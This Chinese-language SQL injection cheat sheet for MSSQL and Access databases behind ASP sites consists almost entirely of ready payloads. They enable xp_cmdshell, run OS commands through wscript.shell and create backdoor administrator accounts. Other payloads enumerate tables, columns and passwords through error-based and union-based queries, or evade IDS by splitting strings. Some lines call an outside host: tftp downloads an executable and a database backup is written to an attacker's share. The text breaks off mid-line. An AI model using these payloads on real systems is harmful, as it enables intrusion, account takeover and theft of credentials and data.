　　; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C：/WINNT/system32/cmd.exe /c net user swap 5245886 /add' 
　　and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell') 
　　;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll' 
　　1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell') 
　　and 1=(select IS_SRVROLEMEMBER('sysadmin')) 判断sa权限是否 
　　and 0<>(select top 1 paths from newtable)-- 暴库大法 
    and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到库名（从1到5都是系统的id，6以上才可以判断） 
　　创建一个虚拟目录E盘： 
　　declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：/inetpub/wwwroot/mkwebdir.vbs -w "默认 Web 站点" -v "e","e：/"' 
　　访问属性：（配合写入一个webshell） 
　　declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：/inetpub/wwwroot/chaccess.vbs -a w3svc/1/ROOT/e +browse' 
　　and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 
　　依次提交 dbid = 7,8,9.... 得到更多的数据库名 
　　and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表 假设为 admin 
　　and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 来得到其他的表。 
　　and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id 
　　and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_id 
　　and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in('id',...)) 来暴出其他的字段 
　　and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名 
　　依次可以得到密码。。。。。假设存在user_id username ,password 等字段 
　　Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 
　　Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin 
　　(union语句到处风靡啊，access也好用 
　　暴库特殊技巧：:%5c='/' 或者把/和/ 修改%5提交 
　　and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 
　　and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名 
　　and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address')) 
　　and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) 判断id值 
　　and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段 
　http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));-- 
　http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1 
　　;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test) 
　http://61.131.96.39/PageShow.asp?TianName=政策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";-- 
　　得到了web路径d:/xxxx,接下来： 
　http://xx.xx.xx.xx/111.asp?id=3400;use ku1;-- 
　http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);-- 
　　传统的存在xp_cmdshell的测试过程： 
　　;exec master..xp_cmdshell 'dir' 
　　;exec master.dbo.sp_addlogin hax;-- 
　　;exec master.dbo.sp_password null,hax,hax;-- 
　　;exec master.dbo.sp_addsrvrolemember hax sysadmin;-- 
　　;exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- 
　　;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';-- 
　　exec master..xp_servicecontrol 'start', 'schedule' 
　　exec master..xp_servicecontrol 'start', 'server' 
　　http：//www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C：/WINNT/system32/cmd.exe /c net user swap 5258 /add' 
　　;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C：/WINNT/system32/cmd.exe /c net localgroup administrators swap/add' 
　http://localhost/show.asp?id=1'; exec master..xp_cmdshell 'tftp -i youip get file.exe'- 
　　declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/' 
　　declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:/' 
　　;declare @a;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat' 
　　如果被限制则可以。 
　　select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax') 
　　传统查询构造： 
　　select * FROM news where id=... AND topic=... AND ..... 
　　admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>' 
　　select 123;-- 
　　;use master;-- 
　　:a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。 
　　'and 1<>(select count(email) from [user]);-- 
　　;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';-- 
　　说明: 
　　上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。 
　　通过查看ffff的用户资料可得第一个用表叫ad 
　　然后根据表名ad得到这个表的ID 
　　ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';-- 
　　象下面这样就可以得到第二个表的名字了 
　　ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--< 
BR>　　ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';-- 
　　ffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';-- 
　　ffff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';-- 
　　exec master..xp_servicecontrol 'start', 'schedule' 
　　exec master..xp_servicecontrol 'start', 'server' 
　　sp_addextendedproc 'xp_webserver', 'c:/temp/xp_foo.dll' 
　　扩展存储就可以通过一般的方法调用： 
　　exec xp_webserver 
　　一旦这个扩展存储执行过，可以这样删除它: 
　　sp_dropextendedproc 'xp_webserver' 
　　insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)- 
　　insert into users values( 667,123,123,0xffff)- 
　　insert into users values ( 123, 'admin''--', 'password', 0xffff)- 
　　;and user>0 
　　;;and (select count(*) from sysobjects)>0 
　　;;and (select count(*) from mysysobjects)>0 //为access数据库 
　　-----------------------------------------------------------通常注射的一些介绍： 
　　A) ID=49 这类注入的参数是数字型，SQL语句原貌大致如下： 
　　select * from 表名 where 字段=49 
　　注入的参数为ID=49 And [查询条件]，即是生成语句： 
　　select * from 表名 where 字段=49 And [查询条件] 
　　(B) Class=连续剧 这类注入的参数是字符型，SQL语句原貌大致概如下： 
　　select * from 表名 where 字段='连续剧' 
　　注入的参数为Class=连续剧' and [查询条件] and ''=' ，即是生成语句： 
　　select * from 表名 where 字段='连续剧' and [查询条件] and ''='' 
　　(C) 搜索时没过滤参数的，如keyword=关键字，SQL语句原貌大致如下： 
　　select * from 表名 where 字段like '%关键字%' 
　　注入的参数为keyword=' and [查询条件] and '%25'='， 即是生成语句： 
　　select * from 表名 where字段like '%' and [查询条件] and '%'='%' 
　　;;and (select Top 1 name from sysobjects where xtype='U' and status>0)>0 
　　sysobjects是SQLServer的系统表，存储着所有的表名、视图、约束及其它对象，xtype='U' and status>0，表示用户建立的表名，上面的语句将第一个表名取出，与0比较大小，让报错信息把表名暴露出来。 
　　;;and (select Top 1 col_name(object_id('表名'),1) from sysobjects)>0 
　　从⑤拿到表名后，用object_id('表名')获取表名对应的内部ID，col_name(表名ID,1)代表该表的第1个字段名，将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。 
　　post.htm内容：主要是方便输入。 
　　枚举出他的数据表名： 
　　id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);-- 
　　这是将第一个表名更新到aaa的字段处。 
　　读出第一个表，第二个表可以这样读出来（在条件后加上 and name<>'刚才得到的表名'）。 
　　id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');-- 
　　然后id=1552 and exists(select * from aaa where aaa>5) 
　　读出第二 

表，^^^^^^一个个的读出，直到没有为止。 
　　读字段是这样： 
　　id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));-- 
　　然后id=1552 and exists(select * from aaa where aaa>5)出错，得到字段名 
　　id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));-- 
　　然后id=1552 and exists(select * from aaa where aaa>5)出错，得到字段名 
　　--------------------------------高级技巧： 
　　[获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名] 
　　update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条件] 
　　select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',…) 
　　通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组] 
　　[获得数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名] 
　　update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条件] 
　　绕过IDS的检测[使用变量] 
　　declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/' 
　　declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:/' 
　　1、 开启远程数据库 
　　基本语法 
　　select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1' ) 
　　参数: (1) OLEDB Provider name 
　　2